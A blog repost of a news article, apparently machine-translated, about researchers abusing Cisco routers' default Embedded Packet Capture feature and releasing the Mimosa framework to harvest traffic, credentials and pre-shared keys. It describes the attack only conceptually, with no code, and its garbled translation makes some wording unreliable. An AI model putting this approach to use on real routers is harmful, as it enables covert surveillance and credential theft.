One characteristic of the default router Cisco can be easily abused to collect data, security researchers warn.
Embedded Packet Capture (EPC) is designed by Cisco as troubleshooting and analysis tool. This feature allows network administrators to capture data packets flowing through a Cisco router.
Security researchers Brazilian Joaquim Espinhara and Rafael Silva were able to abuse of the function and build a system to suck up huge volumes of data.
Silva told El Reg that the hack was made possible by exploiting the EPC function, rather than exploiting a vulnerability as such. Both Cisco and researchers agree that the abuse of the function would need to access privileged user (such as the admin control), an obstacle that aspiring addicts would need to pass through some other attack or social engineering ploy.
However, because the functionality of troubleshooting is enabled by default presents a risk, according to Silva.
"There is no way to disable this function. Since this function is commonly used for troubleshooting network problems," said Silva. "Cisco has to implement some features that could stop or [do] this approach difficult to abuse EPC."
Taking out the attack requires "knowledge medium", but since and about $ 10k in cash "to build your mini-NSA to collect and use the framework Mimosa", according to Silva. The main limitation is that would-be attackers must have full (Active mode) access to the router or router.
A hack proof-of-concept developed by researchers using multiple Cisco route configured with default account to send traffic data (input, output, or both) in a repository. Packages of raw data acquired in this way can be interrogated to extract the type of information that hackers are generally interested, such as user credentials, pre-shared keys and other sensitive information. The researchers plan to extend their research to develop other attacks.
EPC is seen by Cisco as "a well-documented series of commands that require access of privileged users ... For this reason, our best advice to customers is to ensure appropriate user access controls are in place," he added a spokesman.
The research - which will be presented and demonstrated for the first time to infiltrate security conference in Miami on Thursday (April 16) - is more relevant for penetration testers. Researchers have accompanied the presentation with the release of Mimosa Framework 1.0 source code, a framework of exploitation network kit that can be used to execute attacks based both on known vulnerabilities exploited or brute-forcing weak passwords (think Metaspolit for network kit).
Silva said: "With Mimosa, you can check out a huge list of router start capturing, stop capturing Export capture and do some basic attacks such as brute force and exploiting CVE old ..."
Configuring the router to collect data and create a huge database is the type of feature likely to be of interest to the intelligence agencies of the signals, the continuous loss Edward Snowden (at least) would suggest.
Cisco has introduced the function of about six years ago. Silva is not aware whether or not people might have abused function to collect and analyze the data later. "I think that the NSA has better techniques to do it," he joked.
"Other vendors may have the same function to capture and export packets to a remote location," according to Silva, but these shortcomings can is outside the scope of Espinhara Silva and research.
Infiltrator is a two-day conference which focused exclusively on security offensive. It features carefully chosen technical talks on the latest exploits and techniques. ®
No comments:
Post a Comment
Note: only a member of this blog may post a comment.